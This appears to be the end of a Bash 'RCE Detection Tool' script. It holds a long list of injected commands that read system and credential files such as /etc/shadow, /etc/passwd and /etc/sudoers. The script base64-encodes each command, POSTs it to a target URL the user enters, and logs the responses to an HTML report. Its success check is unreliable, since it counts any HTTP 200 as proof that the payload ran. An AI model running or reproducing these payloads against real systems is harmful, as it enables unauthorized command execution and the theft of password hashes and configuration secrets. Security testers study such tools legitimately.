        "ls -la /etc/sysconfig/irqbalance"
        "ls -la /etc/sysconfig/pcmcia"
        "ls -la /etc/sysconfig/networking/devices/"
        "ls -la /etc/sysconfig/networking/profiles"
        "ls -la /etc/sysconfig/networking-scripts/"
        "ls -la /etc/sysconfig/network-scripts/ifcfg-eth*"
        "ls -la /etc/sysconfig/networking/devices/"
        "ls -la /etc/sysconfig/networking/profiles/default/"
        "ls -la /etc/sysconfig/networking/profiles/default/resolv.conf"
        "ls -la /etc/sysconfig/networking/profiles/default/hosts"
        "ls -la /etc/sysconfig/networking/profiles/default/network"
        "ls -la /etc/sysconfig/networking/profiles/default/sshd"
        "ls -la /etc/sysconfig/networking/profiles/default/syslog"
        "ls -la /etc/sysconfig/networking/profiles/default/iptables"
        "ls -la /etc/sysconfig/networking/profiles/default/iptables-config"
        "ls -la /etc/sysconfig/networking/profiles/default/selinux"
        "ls -la /etc/sysconfig/networking/profiles/default/authconfig"
        "ls -la /etc/sysconfig/networking/profiles/default/clock"
        "ls -la /etc/sysconfig/networking/profiles/default/keyboard"
        "ls -la /etc/sysconfig/networking/profiles/default/mouse"
        "ls -la /etc/sysconfig/networking/profiles/default/printer"
        "ls -la /etc/sysconfig/networking/profiles/default/console"
        "ls -la /etc/sysconfig/networking/profiles/default/system-config-*"
        "ls -la /etc/sysconfig/networking/profiles/default/hwconf"
        "ls -la /etc/sysconfig/networking/profiles/default/irqbalance"
        "ls -la /etc/sysconfig/networking/profiles/default/pcmcia"
        "cat /etc/passwd"
        "cat /etc/shadow"
        "cat /etc/sudoers"
        "cat /etc/ssh/sshd_config"
        "cat /etc/hosts.allow"
        "cat /etc/hosts.deny"
        "cat /etc/crontab"
        "cat /etc/cron.d/*"
        "cat /etc/cron.daily/*"
        "cat /etc/cron.weekly/*"
        "cat /etc/cron.monthly/*"
        "cat /etc/cron.hourly/*"
        "cat /etc/security/limits.conf"
        "cat /etc/sysctl.conf"
        "cat /etc/pam.d/*"
        "cat /etc/rsyslog.conf"
        "cat /etc/logrotate.conf"
        "cat /etc/audit/auditd.conf"
        "cat /etc/audit/audit.rules"
        "cat /etc/modprobe.conf"
        "cat /etc/modules"
        "cat /etc/profile"
        "cat /etc/environment"
        "cat /etc/bashrc"
        "cat /etc/login.defs"
        "cat /etc/group"
        "cat /etc/passwd"
        "cat /etc/hosts"
        "cat /etc/sudoers"
        "cat /etc/shells"
        "cat /etc/securetty"
        "cat /etc/services"
        "cat /etc/xinetd.conf"
        "cat /etc/inetd.conf"
        "cat /etc/motd"
        "cat /etc/issue"
        "cat /etc/hosts.equiv"
        "cat /etc/exports"
        "cat /etc/auto.master"
        "cat /etc/auto_home"
        "cat /etc/auto.direct"
        "cat /etc/fstab"
        "cat /etc/mtab"
        "cat /etc/resolv.conf"
        "cat /etc/hostname"
        "cat /etc/host.conf"
        "cat /etc/nsswitch.conf"
        "cat /etc/sysconfig/network"
        "cat /etc/sysconfig/network-scripts/*"
        "cat /etc/sysconfig/networking/*"
        "cat /etc/sysconfig/iptables"
        "cat /etc/sysconfig/iptables-config"
        "cat /etc/sysconfig/selinux"
        "cat /etc/sysconfig/authconfig"
        "cat /etc/sysconfig/clock"
        "cat /etc/sysconfig/keyboard"
        "cat /etc/sysconfig/mouse"
        "cat /etc/sysconfig/printer"
        "cat /etc/sysconfig/console"
        "cat /etc/sysconfig/system-config-*"
        "cat /etc/sysconfig/hwconf"
        "cat /etc/sysconfig/irqbalance"
        "cat /etc/sysconfig/pcmcia"
        "cat /etc/sysconfig/networking/devices/*"
        "cat /etc/sysconfig/networking/profiles/*"
        "cat /etc/sysconfig/networking-scripts/*"
        "cat /etc/sysconfig/networking/devices/*"
        "cat /etc/sysconfig/networking/profiles/default/*"
        "cat /etc/sysconfig/networking/profiles/default/sshd"
        "cat /etc/sysconfig/networking/profiles/default/syslog"
        "cat /etc/sysconfig/networking/profiles/default/iptables"
        "cat /etc/sysconfig/networking/profiles/default/iptables-config"
        "cat /etc/sysconfig/networking/profiles/default/selinux"
        "cat /etc/sysconfig/networking/profiles/default/authconfig"
        "cat /etc/sysconfig/networking/profiles/default/clock"
        "cat /etc/sysconfig/networking/profiles/default/keyboard"
        "cat /etc/sysconfig/networking/profiles/default/mouse"
        "cat /etc/sysconfig/networking/profiles/default/printer"
        "cat /etc/sysconfig/networking/profiles/default/console"
        "cat /etc/sysconfig/networking/profiles/default/system-config-*"
        "cat /etc/sysconfig/networking/profiles/default/hwconf"
        "cat /etc/sysconfig/networking/profiles/default/irqbalance"
        "cat /etc/sysconfig/networking/profiles/default/pcmcia"

    )

    # Start HTML output
    cat <<EOF > rce_detection_report.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>RCE Detection Report</title>
<style>
body {
    font-family: Arial, sans-serif;
    margin: 20px;
}
.container {
    max-width: 800px;
    margin: auto;
}
h1 {
    color: #333;
}
h2 {
    color: #555;
}
pre {
    background-color: #f5f5f5;
    padding: 10px;
    border-radius: 5px;
    overflow-x: auto;
    margin-bottom: 10px; /* Add margin bottom to each pre element */
}
.success {
    color: green;
}
.failure {
    color: red;
}
</style>
</head>
<body>
<div class="container">
<h1>RCE Detection Report</h1>
EOF

    # Iterate over payloads and inject them into vulnerable parameters
    for payload in "${payloads[@]}"; do
        echo "Testing payload: $payload"
        encoded_payload=$(echo $payload | base64)
        result=$(curl -s -d "param=$encoded_payload" -X POST "$1")
        response_code=$(echo "$result" | head -n 1)
        echo "<h2>Payload: <a href=\"$1?param=$encoded_payload\" target=\"_blank\">$payload</a></h2>" >> rce_detection_report.html
        echo "<p>Response Code: $response_code</p>" >> rce_detection_report.html
        if [[ $response_code == *"200"* ]]; then
            echo "<p class=\"success\">Payload executed successfully</p>" >> rce_detection_report.html
            echo "<pre>$result</pre>" >> rce_detection_report.html
        else
            echo "<p class=\"failure\">Payload execution failed</p>" >> rce_detection_report.html
        fi
        echo "<hr>" >> rce_detection_report.html  # Add a horizontal rule after each payload's response
    done

    # End HTML output
    cat <<EOF >> rce_detection_report.html
</div>
</body>
</html>
EOF

    echo "HTML report generated: rce_detection_report.html"
}

# Main function
main() {
    echo "RCE Detection Tool"
    echo "------------------"

    # Prompt user for target URL
    read -p "Enter your target URL: " target_url

    # Perform RCE detection and generate HTML report
    detect_rce "$target_url"
}

# Call main function
main

firefox rce_detection_report.html

rm -r tempCodeRunnerFile.sh